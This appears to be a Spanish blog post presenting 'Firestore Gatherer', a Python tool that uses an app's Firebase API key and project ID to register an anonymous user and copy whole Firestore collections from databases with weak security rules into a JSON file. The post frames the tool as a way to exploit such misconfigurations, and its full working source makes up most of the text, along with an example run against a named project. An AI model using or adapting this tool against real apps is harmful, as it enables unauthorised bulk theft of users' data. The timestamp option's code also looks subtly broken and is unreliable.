Firestore Gatherer - Copia de una base de datos Firestore desprotegida

Introducción

Firebase Firestore es una base de datos NoSQL en la nube proporcionada por Google como parte de la plataforma Firebase que permite a los desarrolladores almacenar, sincronizar y consultar datos para sus aplicaciones web, móviles y de servidor en tiempo real. Los datos se organizan en documentos individuales que se agrupan en colecciones. Cada documento es una estructura de datos JSON que contiene pares clave-valor.

En cuanto a los posibles problemas de seguridad que podrían dejar desprotegido un proyecto que utiliza Firebase Firestore, aquí hay algunos puntos a considerar:

Reglas de seguridad mal configuradas: Firestore permite a los desarrolladores establecer reglas de seguridad que controlan quién puede leer y escribir en la base de datos. Si estas reglas no se configuran correctamente, es posible que la base de datos esté expuesta a accesos no autorizados.
Falta de control de acceso a nivel de usuario: Si no se implementa adecuadamente la autenticación y autorización de usuarios, es posible que usuarios no autorizados puedan acceder a datos sensibles en Firestore.

Para la explotación de estas vulnerabilidades se ha desarrollado una herramienta en Python que a partir de unos parámetros, que pueden ser obtenidos desde la aplicación original que utiliza la base de datos, crea una cuenta de usuario anónima y guarda la copia de la base de datos en un archivo en formato JSON.

Uso de Firestore Gatherer

Para la utilización del programa, en primer lugar tenemos que definir un par de variables en un archivo de configuración JSON, apiKey y projectId. En el caso de una aplicación de Android, se pueden obtener desempaquetándola y observando el archivo res/values/strings.xml. Así quedaría el archivo.

{
    "apiKey": "Valor de la variable google_api_key",
    "projectId": "Valor de la variable project_id"
}

Los parámetros a utilizar son los siguientes:

-f: El archivo de configuración JSON
-c: Las colección de la base de datos a obtener, separadas por comas, por ejemplo coleccion1,coleccion2
-t: Especificar para guardar la fecha de creación y modificación de cada documento
-a: Por defecto el programa solo descarga la primera página de documentos de cada colección. Si se especifica este parámetro se descargarán todos. AVISO: ESTO PUEDE CONSUMIR LA CUOTA DE LA BASE DE DATOS E INCURRIR EN FACTURACIÓN EXTRA
-o: El archivo de configuración en el que se guardará la base de datos

Este es un ejemplo de su ejecución:

$ firebase_gatherer.py -f firebase_cfg.json -c collection1,collection2,collection3 -o firebase_db.json
Welcome to Firebase Gatherer. Gathering ['collection1', 'collection2', 'collection3'] collections from red-alloy-245217 project.
WARNING:root:From collection collection1 fetched 3 records
WARNING:root:From collection collection2 fetched 3 records
WARNING:root:From collection collection3 fetched 25 records

Código fuente

import argparse
import json
import logging
import os
import requests

FIREBASE_DOCUMENTS_ENDPOINT = 'https://firestore.googleapis.com/v1/projects/{0}/databases/(default)/documents/{1}'
GOOGLE_IDENTITY_ENDPOINT = 'https://www.googleapis.com/identitytoolkit/v3/relyingparty/signupNewUser'

firestore_rest_errors = {
    'ABORTED': 'The request conflicted with another request.',
    'ALREADY_EXISTS': 'The request tried to create a document that already exists.',
    'DEADLINE_EXCEEDED': 'The Cloud Firestore server handling the request exceeded a deadline.',
    'FAILED_PRECONDITION': 'The request did not meet one of its preconditions. For example, a query request might require an index not yet defined. See the message field in the error response for the precondition that failed.',
    'INTERNAL': 'The Cloud Firestore server returned an error.',
    'INVALID_ARGUMENT': 'A request parameter includes an invalid value. See the message field in the error response for the invalid value.',
    'NOT_FOUND': 'The request attempted to update a document that does not exist.',
    'PERMISSION_DENIED': 'The user is not authorized to make this request.',
    'RESOURCE_EXHAUSTED': 'The project exceeded either its quota or the region/multi-region capacity.',
    'UNAUTHENTICATED': 'The request did not include valid authentication credentials.',
    'UNAVAILABLE': 'The Cloud Firestore server returned an error.'    
}

'''
proxy_dict = { 
        'http'  : 'http://127.0.0.1:8888', 
        'https' : 'http://127.0.0.1:8888',
}
'''
proxy_dict = {}

def get_document_field(field_type, value):
    field = None
    # Check type and value
    if field_type in ['stringValue', 'doubleValue', 'booleanValue', 'nullValue', 'timestampValue', 'referenceValue']:
        field = value
    elif field_type == 'integerValue':
        field = int(value)
    elif field_type == 'mapValue':
        field = get_document_fields(value, {}, False)
    elif field_type == 'arrayValue':
        field = []
        for val in value['values']:
            for field_type, value in val.items():
                field.append(get_document_field(field_type, value))
    elif field_type == 'geoPointValue':
        field = str(value['latitude']) + ', ' + str(value['longitude'])
    return field

def get_document_fields(doc, document, timestamp):
    for field_name, field_value in doc['fields'].items():
        for field_type, value in field_value.items():
            document[field_name] = get_document_field(field_type, value)
    if timestamp and 'createTime' in document and 'updateTime' in document:
        document['create_time'] = doc['createTime']
        document['update_time'] = doc['updateTime']
    return document

def get_firestore_collection(collection_name, timestamp, retrieve_all_pages):
    documents = []
    next_page_token = None
    while True:
        url = FIREBASE_DOCUMENTS_ENDPOINT.format(firebaseConfig['projectId'], collection_name)
        headers = {
            'Authorization': 'Firebase ' + firebaseConfig['tokenId']
        }
        params_dict = {}
        if next_page_token != None:
            params_dict['pageToken'] = next_page_token
        req = requests.get(url, headers=headers, params=params_dict, proxies=proxy_dict)
        req_json = req.json()
        if req.status_code != 200:
            logging.error(firestore_rest_errors[req_json['error']['status']] + ' Retrying...')
            generate_anon_token()
            continue

        if 'documents' in req_json:
            for doc in req_json['documents']:
                document = {}
                document['id'] = doc['name']
                document = get_document_fields(doc, document, timestamp)
                documents.append(document)
        
        logging.warning('From collection ' + collection_name + ' fetched ' + str(len(documents)) + ' records')

        if 'nextPageToken' in req_json and retrieve_all_pages:
            next_page_token = req_json['nextPageToken']
        else:
            break
    return documents

def generate_anon_token():
    params_dict = {
        'key': firebaseConfig['apiKey']
    }
    req = requests.post(GOOGLE_IDENTITY_ENDPOINT, params=params_dict, proxies=proxy_dict)
    json_response = req.json()
    firebaseConfig['tokenId'] = json_response['idToken']
    json.dump(firebaseConfig, open(filename, 'w'), indent=4)
    logging.warning('Generated new token id: ' + firebaseConfig['tokenId'][:8] + '...')

def get_arguments():
    parser = argparse.ArgumentParser(prog='Firestore Gatherer', description='Gather the contents of an unprotected Firestore Database.')
    parser.add_argument('-f', '--config-file', help='File containing the Firestore configuration', required=True)
    parser.add_argument('-c', '--collections', help='Names of the collections, separated by commas. Example: collection1,collection2', required=True)
    parser.add_argument('-t', '--timestamp', help='Save the timestamp for every document.', action=argparse.BooleanOptionalAction, default=False)
    parser.add_argument('-a', '--retrieve-all', help='By default the program only fetches the first page of every collection. With this adjustment, it will retrieve all pages. WARNING: THIS CAN CONSUME THE DATABASE QUOTA AND INCUR INTO EXTRA BILLING!!!', action=argparse.BooleanOptionalAction, default=False)
    parser.add_argument('-o', '--output-file', help='File to save the database.', required=True)
    return parser.parse_args()

# Load configuration from file
args = get_arguments()
filename = args.config_file
if not os.path.exists(filename):
    logging.error('The specified filename does not exist')
    exit(-1)
try:
    firebaseConfig = json.load(open(filename))
    for key, val in firebaseConfig.items():
        # all fields ['apiKey', 'authDomain', 'databaseURL', 'projectId', 'storageBucket', 'messagingSenderId', 'appId', 'tokenId']
        if key not in ['apiKey', 'projectId', 'tokenId']:
            raise Exception()
except:
    logging.error('The loaded file is invalid')
    exit(-1)

# Generate token
if 'tokenId' not in firebaseConfig:
    generate_anon_token()

# Collection argument
try:
    collections = args.collections.split(',')
except:
    logging.error('Invalid collections specified')
    exit(-1)

# Other arguments
timestamp = args.timestamp
output_file = args.output_file
retrieve_all = args.retrieve_all

print('Welcome to Firebase Gatherer. Gathering ' + str(collections) + ' collections from ' + firebaseConfig['projectId'] + ' project.')

lib = []
for collection in collections:
    col = {}
    col['name'] = collection
    col['documents'] = get_firestore_collection(collection, timestamp, retrieve_all)
    lib.append(col)

json_dump = json.dump(lib, open(output_file, 'w'), indent=4)

Introducción#

Uso de Firestore Gatherer#

Código fuente#

Introducción

Uso de Firestore Gatherer

Código fuente